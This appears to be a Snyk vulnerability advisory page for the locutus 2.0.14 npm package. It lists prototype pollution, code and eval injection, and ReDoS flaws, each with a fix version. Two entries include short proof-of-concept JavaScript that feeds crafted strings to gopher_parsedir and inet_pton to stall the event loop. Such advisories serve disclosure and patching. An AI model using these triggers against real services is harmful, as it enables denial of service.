locutus 2.0.14

Direct Vulnerabilities

Known vulnerabilities in the locutus package. This does not include vulnerabilities belonging to this package’s dependencies.

Fix vulnerabilities automatically

Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

Fix for free

Vulnerability	Vulnerable Version
H Prototype Pollution locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes Affected versions of this package are vulnerable to Prototype Pollution in the `unserialize` function. An attacker can inject arbitrary properties into the prototype of deserialized objects, potentially bypassing authorization checks or causing denial of service by overriding built-in methods, by supplying specially crafted serialized payloads containing the `__proto__` key. How to fix Prototype Pollution? Upgrade `locutus` to version 3.0.25 or higher.	<3.0.25
C Arbitrary Code Injection locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes Affected versions of this package are vulnerable to Arbitrary Code Injection via the `create_function(args, code)` function. An attacker can execute arbitrary code by supplying unsanitized input to the arguments, which are passed directly to the `Function` constructor. How to fix Arbitrary Code Injection? Upgrade `locutus` to version 3.0.14 or higher.	<3.0.14
C Eval Injection locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes Affected versions of this package are vulnerable to Eval Injection in the `call_user_func_array()` function, which executes `eval()` on user-supplied input, and does not sanitize the second argument in the input array (the method name). An attacker can execute arbitrary JavaScript code with the privileges of the Node.js runtime if the target application is being used as a gateway or router using Locutus functions. How to fix Eval Injection? Upgrade `locutus` to version 3.0.0 or higher.	<3.0.0
H Prototype Pollution locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes Affected versions of this package are vulnerable to Prototype Pollution via the `locutus.php.strings.parse_str` function. An attacker can modify the prototype of global objects by supplying crafted input, leading to authentication bypass, denial of service, or execution of arbitrary code if polluted properties are passed to sensitive sinks. How to fix Prototype Pollution? Upgrade `locutus` to version 2.0.39 or higher.	>=2.0.12 <2.0.39
M Regular Expression Denial of Service (ReDoS) locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `gopher_parsedir` function. PoC by Yeting Li `var gopher_parsedir = require("locutus/php/net-gopher/gopher_parsedir") function build_attack(n) { var ret = "" for (var i = 0; i < n; i++) { ret += "\t" } return ret + "!"; } var attack_str = build_attack(5000) // var entry = gopher_parsedir('0All about my gopher site.\t/allabout.txt\tgopher.example.com\t70\u000d\u000a') var entry = gopher_parsedir(attack_str)` How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `locutus` to version 2.0.15 or higher.	<2.0.15
M Regular Expression Denial of Service (ReDoS) locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The regular expression at `src/php/network/inet_pton.js:24` is vulnerable to ReDoS. It is possible to cause increasing slow-downs which lock the event loop by passing strings which have some number of repeating characters followed by 'a .' string. PoC by Robert McLaughlin `const inet_pton = require('locutus/php/network/inet_pton'); console.log('starting') for (let i=4; i < 40; i++) { const str = new Array(i).fill('a').join('') + '.'; const start = + new Date(); inet_pton(str); const elapsed = (+ new Date()) - start; console.log('i=' + i + ' elapsed (seconds): ' + elapsed / 1000); }` How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `locutus` to version 2.0.15 or higher.	<2.0.15

Vulnerability

Vulnerable Version

Prototype Pollution

locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes

Affected versions of this package are vulnerable to Prototype Pollution in the unserialize function. An attacker can inject arbitrary properties into the prototype of deserialized objects, potentially bypassing authorization checks or causing denial of service by overriding built-in methods, by supplying specially crafted serialized payloads containing the __proto__ key.

How to fix Prototype Pollution?

Upgrade locutus to version 3.0.25 or higher.

<3.0.25

Arbitrary Code Injection

locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes

Affected versions of this package are vulnerable to Arbitrary Code Injection via the create_function(args, code) function. An attacker can execute arbitrary code by supplying unsanitized input to the arguments, which are passed directly to the Function constructor.

How to fix Arbitrary Code Injection?

Upgrade locutus to version 3.0.14 or higher.

<3.0.14

Eval Injection

locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes

Affected versions of this package are vulnerable to Eval Injection in the call_user_func_array() function, which executes eval() on user-supplied input, and does not sanitize the second argument in the input array (the method name). An attacker can execute arbitrary JavaScript code with the privileges of the Node.js runtime if the target application is being used as a gateway or router using Locutus functions.

How to fix Eval Injection?

Upgrade locutus to version 3.0.0 or higher.

<3.0.0

Prototype Pollution

locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes

Affected versions of this package are vulnerable to Prototype Pollution via the locutus.php.strings.parse_str function. An attacker can modify the prototype of global objects by supplying crafted input, leading to authentication bypass, denial of service, or execution of arbitrary code if polluted properties are passed to sensitive sinks.

How to fix Prototype Pollution?

Upgrade locutus to version 2.0.39 or higher.

>=2.0.12 <2.0.39

Regular Expression Denial of Service (ReDoS)

locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the gopher_parsedir function.

PoC by Yeting Li

var gopher_parsedir = require("locutus/php/net-gopher/gopher_parsedir")
function build_attack(n) {
 var ret = ""
 for (var i = 0; i < n; i++) {
  ret += "\t"
 }
 return ret + "!";
}


var attack_str = build_attack(5000)
// var entry = gopher_parsedir('0All about my gopher site.\t/allabout.txt\tgopher.example.com\t70\u000d\u000a')
var entry = gopher_parsedir(attack_str)

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade locutus to version 2.0.15 or higher.

<2.0.15

Regular Expression Denial of Service (ReDoS)

locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The regular expression at src/php/network/inet_pton.js:24 is vulnerable to ReDoS. It is possible to cause increasing slow-downs which lock the event loop by passing strings which have some number of repeating characters followed by 'a .' string.

PoC by Robert McLaughlin

const inet_pton = require('locutus/php/network/inet_pton');
console.log('starting')
for (let i=4; i < 40; i++)
{
    const str = new Array(i).fill('a').join('') + '.';
    const start = + new Date();

    inet_pton(str);

    const elapsed = (+ new Date()) - start;
   
    console.log('i=' + i + ' elapsed (seconds): ' + elapsed / 1000);
}

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade locutus to version 2.0.15 or higher.

<2.0.15

locutus@2.0.14

Locutus other languages' standard libraries to JavaScript for fun and educational purposes

latest version

latest non vulnerable version

first published

latest version published

licenses detected

Direct Vulnerabilities

Fix vulnerabilities automatically

PoC by Yeting Li

PoC by Robert McLaughlin